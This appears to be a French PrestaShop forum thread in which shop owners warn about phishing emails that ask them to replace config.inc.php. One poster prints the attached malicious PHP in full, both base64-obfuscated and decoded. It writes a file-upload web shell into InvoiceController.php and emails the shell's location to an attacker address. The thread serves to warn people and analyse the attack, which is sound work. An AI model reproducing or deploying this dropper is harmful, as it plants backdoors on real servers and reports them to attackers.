Tentative de piratage

[Zouichi]

Bonjour,

j'ai reçu le mail suivant ce matin, venant d'une adresse non officielle, avec un fichier de config à télécharger et changer sur mon serveur.

Je ne sais pas si l'équipe Prestashop peut agir dessus, mais au moins vous êtes au courant ;)

Zouichi

[joseantgv]

Malheureusement, PrestaShop ne peut rien faire.

[WebDesign-Entreprise]

Hello,

J'ai reçu le même email.

Voici le code malveillant décrypté:

fwrite(fopen("controllers/front/InvoiceController.php","w+"),'<?php if(isset($_GET["hahahaha"])){echo"<center><font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Success</b>-->".$_FILES["f"]["name"];}else{echo"<b>Failed";}}}');
$to = "[email protected]";
$subject = "HAHAHAHA GROSSE MERDE -> " . $_SERVER['SERVER_NAME'];
$header = "from: CDLB <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."\r\n";
$message .= "Path : " . __file__ . " (/controllers/front/InvoiceController.php?hahahaha)";
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

Ce code modifie votre fichier controllers/front/InvoiceController.php en y ajoutant un formulaire pour uploader des fichiers sur votre serveur.

On peut identifier deux emails: [email protected] qui ne sert à rien mais [email protected] qui est l'email finale.

On notera également le titre du mail HAHAHHAHA GROSSE MERDE...

[Zouichi]

Au moins ils ont de l'humour

[coeos.pro]

je ne l'ai pas reçu mais l'un de vous 2 pourrait il "afficher le message en texte brut" ou ""afficher la source" ou "afficher le code source" dans sa boite mail histoire d'avoir plus de données ?

 

il est clair qu'aucune entreprise digne de ce nom n'enverra un mail aussi important de cette manière

[WebDesign-Entreprise]

39 minutes ago, coeos.pro said:

je ne l'ai pas reçu mais l'un de vous 2 pourrait il "afficher le message en texte brut" ou ""afficher la source" ou "afficher le code source" dans sa boite mail histoire d'avoir plus de données ?

 

il est clair qu'aucune entreprise digne de ce nom n'enverra un mail aussi important de cette manière

Envoyé en MP

[Richard75008]

Bonjour,

Je l'ai reçu aussi ce matin ! l'expéditeur est : [email protected]

sujet : [IMPORTANT] Mise à jour d'un fichier de configuration de notre CMS

Fichier joint : config.inc.php

j'ai supprimé le mail ....

[WebDesign-Entreprise]

Attention nouvelle tentative ce jour avec un email mieux fait:

Hello  security update !

Following an error concerning a security file linked to CVE-2021-E49.

We have attached the configuration file to update.

Replace config.inc.php from the config folder with the attached file,

We apologize for the inconvenience caused

 

Le fichier est le quasiment le même virus que la dernière fois:

<?php fwrite(fopen(base64_decode('Y29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhw'),base64_decode('dys=')),base64_decode('PD9waHAgaWYoaXNzZXQoJF9HRVRbImhhaGFoYWhhIl0pKXtlY2hvIjxjZW50ZXI+PGZvbnQgY29sb3I9I0ZGRkZGRj5bdW5hbWVdIi5waHBfdW5hbWUoKS4iWy91bmFtZV0iO2VjaG8iPGJyPjxmb250IGNvbG9yPSNGRkZGRkY+W2Rpcl0iLmdldGN3ZCgpLiJbL2Rpcl0iO2VjaG8iPGZvcm0gbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPiI7ZWNobyI8aW5wdXQgdHlwZT1maWxlIG5hbWU9Zj48aW5wdXQgbmFtZT12IHR5cGU9c3VibWl0IGlkPXYgdmFsdWU9dXA+PGJyPiI7aWYoJF9QT1NUWyJ2Il09PXVwKXtpZihAY29weSgkX0ZJTEVTWyJmIl1bInRtcF9uYW1lIl0sJF9GSUxFU1siZiJdWyJuYW1lIl0pKXtlY2hvIjxiPlN1Y2Nlc3M8L2I+LS0+Ii4kX0ZJTEVTWyJmIl1bIm5hbWUiXTt9ZWxzZXtlY2hvIjxiPkZhaWxlZCI7fX19'));

$c0=base64_decode('ZGVlemVydGVzdHNAeWFuZGV4LnJ1');
$o1=base64_decode('Tk9VVkVBVSBQUkVTVEEgLT4g').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')];$i2=base64_decode('ZnJvbTogQ0RMQiA8Y29uZmlncHJlc3RhQG1zLnNrPg==');$n3=base64_decode('TGluayA6IGh0dHA6Ly8=').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('DQo=');$n3.=base64_decode('UGF0aCA6IA==').__file__.base64_decode('ICgvY29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhwP2hhaGFoYWhhKQ==');$d4=@mail($c0,$o1,$n3,$i2);$l5=@mail($c0,$o1,$n3,$i2);?>

Décrypté:

fwrite("controllers/front/InvoiceController.php","w+",'

if(isset($_GET["hahahaha"])){echo"<center><font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Success</b>-->".$_FILES["f"]["name"];}else{echo"<b>Failed";}}}';


$c0="[email protected]";
$o1="NOUVEAU PRESTA ->". $_SERVER[SERVER_NAME];
$i2="from: CDLB <[email protected]>";
$n3="Link : http://".$_SERVER[SERVER_NAME].$_SERVER[REQUEST_URI];
$n3.="Path : ".__file__." (/controllers/front/InvoiceController.php?hahahaha)";
$d4=@mail($c0,$o1,$n3,$i2);$l5=@mail($c0,$o1,$n3,$i2);?>

 

[rhume]

Bonjour à vous toutes et tous,

Je viens de recevoir le même email que "WebDesign-Entreprise" avec cette adresse "[email protected]"

[Dan I]

Hi, I also received a message on March 12th like the one from @WebDesign-Entreprise , but the strange part is that my website is not publicly available yet, all parts are protected by basic auth.
Is it possible that prestashop.com was somehow hacked and that is where they got our e-mail addresses from?

[Mediacom87]

Il y a 10 heures, Dan I a dit :

Hi, I also received a message on March 12th like the one from @WebDesign-Entreprise , but the strange part is that my website is not publicly available yet, all parts are protected by basic auth.
Is it possible that prestashop.com was somehow hacked and that is where they got our e-mail addresses from?

Merci de poster en français dans le forum français ou de poster dans la section du forum correspondant à votre langue.